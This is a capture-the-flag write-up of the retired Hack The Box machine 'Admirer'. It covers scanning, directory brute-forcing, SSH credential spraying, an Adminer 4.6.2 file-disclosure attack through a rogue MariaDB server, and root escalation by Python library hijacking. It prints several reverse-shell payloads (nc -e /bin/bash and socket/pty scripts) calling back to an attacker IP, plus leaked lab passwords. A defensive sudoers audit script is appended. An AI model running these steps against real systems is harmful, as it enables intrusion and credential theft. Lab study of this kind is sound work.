This article is intended solely for technical exchange, learning and research. Using the techniques in it for illegal purposes or to cause damage is strictly prohibited; the author of this article bears no responsibility for any consequences.
The target is a retired machine run with the author's VIP subscription; its IP address is shown as 10.10.10.187.
This time https://github.com/Tib3rius/AutoRecon was used for automated, all-round scanning.
Information gathering and enumeration. https://github.com/codingo/Reconnoitre is similar to autorecon.
autorecon 10.10.10.187 -o ./Legacy-autorecon
masscan -p1-65535 10.10.10.187 --rate=1000 -e tun0 > ports
# masscan prints "Discovered open port 21/tcp on ..."; field 4 is "21/tcp". Joining the
# sorted port numbers needs tr to replace newlines, not spaces, to get "21,22,80".
ports=$(cat ports | awk -F " " '{print $4}' | awk -F "/" '{print $1}' | sort -n | tr '\n' ',' | sed 's/,$//')
nmap -Pn -sV -sC -p$ports 10.10.10.187
sudo nmap -sS -sV -T4 -O -A -v 10.10.10.187
Automated nmap wrapper: https://github.com/21y4d/nmapAutomator
New directory brute-forcing tool: https://github.com/phra/rustbuster
Three ports turned out to be open. For port 21, a search based on the reported version found no matching exploit, and nothing usable was found for port 22 either, so port 80 was the remaining option. The gathered information shows a robots.txt that disallows access to /admin-dir.
Combined with the official hint that enumeration is required, directory enumeration is the likely path, and a fairly new tool was used for it.
Download the binary:
wget https://github.com/phra/rustbuster/releases/download/v3.0.3/rustbuster-v3.0.3-x86_64-unknown-linux-gnu -O rustbuster
Probe directories:
./rustbuster dir -u http://10.10.10.187/admin-dir/ -w /usr/share/seclists/Discovery/Web-Content/common.txt -e php,txt --threads 20
Two important files were found:
GET 200 OK http://10.10.10.187/admin-dir/contacts.txt
GET 200 OK http://10.10.10.187/admin-dir/credentials.txt
Download them with wget.
Extract the usernames and passwords from the information above and use them for a password brute-force.
Use cme to test the credentials against SSH.
https://github.com/byt3bl33d3r/CrackMapExec/releases
kali@kali:~/Downloads/htb/admirer$ ./cme ssh 10.10.10.187 -u usernames -p passwords
SSH 10.10.10.187 22 10.10.10.187 [*] SSH-2.0-OpenSSH_7.4p1 Debian-10+deb9u7
SSH 10.10.10.187 22 10.10.10.187 [-] p.wise:fgJr6q#SW:$P Authentication failed.
SSH 10.10.10.187 22 10.10.10.187 [-] p.wise:%n?4Wz}R$tTF7 Authentication failed.
SSH 10.10.10.187 22 10.10.10.187 [-] p.wise:w0rdpr3ss01! Authentication failed.
SSH 10.10.10.187 22 10.10.10.187 [-] r.nayyar:fgJr6q#SW:$P Authentication failed.
SSH 10.10.10.187 22 10.10.10.187 [-] r.nayyar:%n?4Wz}R$tTF7 Authentication failed.
SSH 10.10.10.187 22 10.10.10.187 [-] r.nayyar:w0rdpr3ss01! Authentication failed.
SSH 10.10.10.187 22 10.10.10.187 [-] a.bialik:fgJr6q#SW:$P Authentication failed.
SSH 10.10.10.187 22 10.10.10.187 [-] a.bialik:%n?4Wz}R$tTF7 Authentication failed.
SSH 10.10.10.187 22 10.10.10.187 [-] a.bialik:w0rdpr3ss01! Authentication failed.
SSH 10.10.10.187 22 10.10.10.187 [-] l.galecki:fgJr6q#SW:$P Authentication failed.
SSH 10.10.10.187 22 10.10.10.187 [-] l.galecki:%n?4Wz}R$tTF7 Authentication failed.
SSH 10.10.10.187 22 10.10.10.187 [-] l.galecki:w0rdpr3ss01! Authentication failed.
SSH 10.10.10.187 22 10.10.10.187 [-] h.helberg:fgJr6q#SW:$P Authentication failed.
SSH 10.10.10.187 22 10.10.10.187 [-] h.helberg:%n?4Wz}R$tTF7 Authentication failed.
SSH 10.10.10.187 22 10.10.10.187 [-] h.helberg:w0rdpr3ss01! Authentication failed.
SSH 10.10.10.187 22 10.10.10.187 [-] b.rauch:fgJr6q#SW:$P Authentication failed.
SSH 10.10.10.187 22 10.10.10.187 [-] b.rauch:%n?4Wz}R$tTF7 Authentication failed.
SSH 10.10.10.187 22 10.10.10.187 [-] b.rauch:w0rdpr3ss01! Authentication failed.
SSH 10.10.10.187 22 10.10.10.187 [-] w.cooper:fgJr6q#SW:$P Authentication failed.
SSH 10.10.10.187 22 10.10.10.187 [-] w.cooper:%n?4Wz}R$tTF7 Authentication failed.
SSH 10.10.10.187 22 10.10.10.187 [-] w.cooper:w0rdpr3ss01! Authentication failed.
None of the brute-force attempts succeeded, so try the FTP account and password given above.
Extract password-related keywords:
kali@kali:~/Downloads/htb/admirer/html$ grep -ir password
utility-scripts/db_admin.php: $password = "Wh3r3_1s_w4ld0?";
utility-scripts/db_admin.php: $conn = new mysqli($servername, $username, $password);
index.php: $password = "]F7jLHw:*G>UPrTo}~A"d6b";
index.php: $conn = new mysqli($servername, $username, $password, $dbname);
Or (alternation with | needs extended regular expressions, hence -E):
grep -iRE "user|pass" ./
Looking through all the downloaded files turned up a few more accounts and passwords. Feeding them into the SSH brute-force failed again. Going back to the html directory and the phpinfo output confirmed that html is the web root; a database connection configuration was found in one of its subdirectories, and enumeration continued from there.
Going through the downloaded files, the files and directories that probably exist on the target were identified:
kali@kali:~/Downloads/htb/admirer/html$ cd utility-scripts/
kali@kali:~/Downloads/htb/admirer/html/utility-scripts$ ls
admin_tasks.php db_admin.php info.php phptest.php
Probe that directory again for other content:
./rustbuster dir -u http://10.10.10.187/utility-scripts/ -w /usr/share/seclists/Discovery/Web-Content/big.txt -e php,txt --threads 20
This finally revealed adminer.php, a MySQL database management tool. None of the database credentials found in the files downloaded over FTP could log in to the database.
http://10.10.10.187/utility-scripts/adminer.php
The version shown is 4.6.2. Searching for an exploit for this version confirms one exists; see:
https://sansec.io/research/adminer-4.6.2-file-disclosure-vulnerability
https://www.foregenix.com/blog/serious-vulnerability-discovered-in-adminer-tool
As those articles explain, the approach is to set up a MariaDB server on the local Kali machine, make the target's Adminer connect to it, and read sensitive information such as the database credentials the target itself is using.
The detailed steps are as follows:
Install a MySQL-compatible database on the local Kali machine. First check which database packages are available in the local cache:
sudo apt-cache search mysql-server
sudo apt-cache search mysql-client
If none is installed, install it as follows:
sudo apt install mariadb-server-10.3 mariadb-client-10.3
Start MariaDB:
systemctl start mariadb
If logging in with an empty password does not work, add skip-grant-tables under [mysqld] in 50-server.cnf, save, and restart the database:
systemctl restart mariadb.service
Change the password:
use mysql
select user,plugin from mysql.user;
update mysql.user set authentication_string=password('cntf'), plugin = 'mysql_native_password' where user = 'root';
flush privileges;
systemctl restart mariadb.service
Set up the database:
CREATE DATABASE backup;
USE backup;
CREATE TABLE backup (name VARCHAR(2000));
CREATE USER 'backup'@'10.10.10.187' IDENTIFIED BY 'redhat';
GRANT ALL PRIVILEGES ON backup.* TO 'backup'@'10.10.10.187';
Log in remotely to the database on Kali with the following values (server, username, password, database):
10.10.14.2 backup redhat backup
LOAD DATA LOCAL INFILE '/opt/scripts/admin_tasks.sh' INTO TABLE backup.backup FIELDS TERMINATED BY " "
Create the backup database and user and grant privileges.
Log in remotely to the database on Kali.
After logging in, select the database and execute the SQL statement; the result is as follows.
Execution failed. The phpinfo output shows that open_basedir is set to /var/www/html/, so try a relative path instead:
LOAD DATA LOCAL INFILE '../index.php' INTO TABLE backup.backup FIELDS TERMINATED BY " "
It reports success; selecting the backup database then yields the following sensitive information:
$servername = "localhost";
$username = "waldo";
$password = "&<h5b~yK3F#{PaPB&dA}{H>";
$dbname = "admirerdb";
With these credentials, an SSH login was attempted and succeeded:
sshpass -p '&<h5b~yK3F#{PaPB&dA}{H>' ssh waldo@10.10.10.187
Run sudo -l
This confirmed that sudo can be used for privilege escalation in the manner described above. Reviewing /opt/scripts/admin_tasks.sh shows that when the uid is 0, option 6 (back up the web directory) runs a Python script as root, and that script's library import can be hijacked, so this is the path to root.
#!/bin/bash

view_uptime()
{
    /usr/bin/uptime -p
}

view_users()
{
    /usr/bin/w
}

view_crontab()
{
    /usr/bin/crontab -l
}

backup_passwd()
{
    if [ "$EUID" -eq 0 ]
    then
        echo "Backing up /etc/passwd to /var/backups/passwd.bak..."
        /bin/cp /etc/passwd /var/backups/passwd.bak
        /bin/chown root:root /var/backups/passwd.bak
        /bin/chmod 600 /var/backups/passwd.bak
        echo "Done."
    else
        echo "Insufficient privileges to perform the selected operation."
    fi
}

backup_shadow()
{
    if [ "$EUID" -eq 0 ]
    then
        echo "Backing up /etc/shadow to /var/backups/shadow.bak..."
        /bin/cp /etc/shadow /var/backups/shadow.bak
        /bin/chown root:shadow /var/backups/shadow.bak
        /bin/chmod 600 /var/backups/shadow.bak
        echo "Done."
    else
        echo "Insufficient privileges to perform the selected operation."
    fi
}

backup_web()
{
    if [ "$EUID" -eq 0 ]
    then
        echo "Running backup script in the background, it might take a while..."
        /opt/scripts/backup.py &
    else
        echo "Insufficient privileges to perform the selected operation."
    fi
}

backup_db()
{
    if [ "$EUID" -eq 0 ]
    then
        echo "Running mysqldump in the background, it may take a while..."
        #/usr/bin/mysqldump -u root admirerdb > /srv/ftp/dump.sql &
        /usr/bin/mysqldump -u root admirerdb > /var/backups/dump.sql &
    else
        echo "Insufficient privileges to perform the selected operation."
    fi
}

# Non-interactive way, to be used by the web interface
if [ $# -eq 1 ]
then
    option=$1
    case $option in
        1) view_uptime ;;
        2) view_users ;;
        3) view_crontab ;;
        4) backup_passwd ;;
        5) backup_shadow ;;
        6) backup_web ;;
        7) backup_db ;;
        *) echo "Unknown option." >&2
    esac
    exit 0
fi

# Interactive way, to be called from the command line
options=("View system uptime"
         "View logged in users"
         "View crontab"
         "Backup passwd file"
         "Backup shadow file"
         "Backup web data"
         "Backup DB"
         "Quit")

echo
echo "[[[ System Administration Menu ]]]"
PS3="Choose an option: "
COLUMNS=11
select opt in "${options[@]}"; do
    case $REPLY in
        1) view_uptime ; break ;;
        2) view_users ; break ;;
        3) view_crontab ; break ;;
        4) backup_passwd ; break ;;
        5) backup_shadow ; break ;;
        6) backup_web ; break ;;
        7) backup_db ; break ;;
        8) echo "Bye!" ; break ;;
        *) echo "Unknown option." >&2
    esac
done
exit 0
Read the Python script that gets executed:
waldo@admirer:/opt/scripts$ cat backup.py
#!/usr/bin/python3

from shutil import make_archive

src = '/var/www/html/'

# old ftp directory, not used anymore
#dst = '/srv/ftp/html'

dst = '/var/backups/html'

make_archive(dst, 'gztar', src)
The script imports the function make_archive from the shutil module, so a Python file named shutil.py that defines its own make_archive can be placed where the interpreter will find it first; when the script loads it and calls make_archive, the replacement runs a command as root.
For background on Python library hijacking see: https://rastating.github.io/privilege-escalation-via-python-library-hijacking/
The privilege-escalation code:
import os
def make_archive(h, t, b):
    os.system('nc 10.10.14.2 8833 -e "/bin/bash"')

Or:

#!/usr/bin/python3
import os
import pty
import socket

lhost = "10.10.14.2"
lport = 8888

def make_archive(a,b,c):
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.connect((lhost, lport))
    os.dup2(s.fileno(),0)
    os.dup2(s.fileno(),1)
    os.dup2(s.fileno(),2)
    os.putenv("HISTFILE",'/dev/null')
    pty.spawn("/bin/bash")
    s.close()

Or:

import socket
import pty
import os
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
s.connect(("10.10.14.223",1337))
os.dup2(s.fileno(),0)
os.dup2(s.fileno(),1)
os.dup2(s.fileno(),2)
pty.spawn("/bin/bash")
Trigger the escalation:
sudo PYTHONPATH=/dev/shm /opt/scripts/admin_tasks.sh 6
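The trigger above only works because sudo lets the caller pass PYTHONPATH into the privileged script. As an added example (not part of the original writeup), the following Python audits a sudoers file for the two settings that allow that: a SETENV tag on a rule, and an env_keep entry for interpreter or loader variables. The sudoers content is constructed, and the rule for admin_tasks.sh is an assumption that mirrors the trigger.

```python
import re

# Constructed sudoers content (not taken from the page). The waldo rule is an
# assumption modelled on `sudo PYTHONPATH=... /opt/scripts/admin_tasks.sh 6`,
# which only succeeds if sudo allows the caller to set PYTHONPATH.
SAMPLE_SUDOERS = """\
# /etc/sudoers (constructed example)
Defaults        env_reset
Defaults        env_keep += "PYTHONPATH"
root    ALL=(ALL:ALL) ALL
waldo   ALL=(ALL) SETENV: /opt/scripts/admin_tasks.sh
backup  ALL=(root) NOPASSWD: /usr/bin/mysqldump
"""

# Variables an interpreter or dynamic loader honours. If any of them reaches a
# process running as root, the caller chooses which code that process loads.
DANGEROUS_ENV = {"PYTHONPATH", "PYTHONHOME", "LD_PRELOAD",
                 "LD_LIBRARY_PATH", "PERL5LIB"}


def audit_sudoers(text):
    """Return one finding string per sudoers line that lets a caller inject
    loader variables into a privileged command."""
    findings = []
    for lineno, raw in enumerate(text.splitlines(), 1):
        line = raw.split("#", 1)[0].strip()   # drop comments and blank lines
        if not line:
            continue
        if line.startswith("Defaults"):
            # Defaults env_keep += "VAR VAR2" keeps listed variables despite env_reset
            m = re.search(r'env_keep\s*\+?=\s*"?([^"]*)"?', line)
            if m:
                kept = set(m.group(1).split()) & DANGEROUS_ENV
                if kept:
                    findings.append(f"line {lineno}: env_keep preserves {sorted(kept)}")
            continue
        # User specification: <user> <host>=(<runas>) [TAG:...] <commands>
        # SETENV lets the caller set *any* variable on the command line.
        if "SETENV:" in line:
            user = line.split()[0]
            cmds = line.rsplit("SETENV:", 1)[1].strip()
            findings.append(f"line {lineno}: {user} may set any env var for {cmds}")
    return findings


if __name__ == "__main__":
    for finding in audit_sudoers(SAMPLE_SUDOERS):
        print(finding)
```

Removing the SETENV tag and the env_keep entry restores sudo's default env_reset behaviour, so PYTHONPATH never reaches the root process. Running the backup as `python3 -I /opt/scripts/backup.py` (isolated mode) additionally makes the interpreter ignore PYTHONPATH and stop searching the script's own directory.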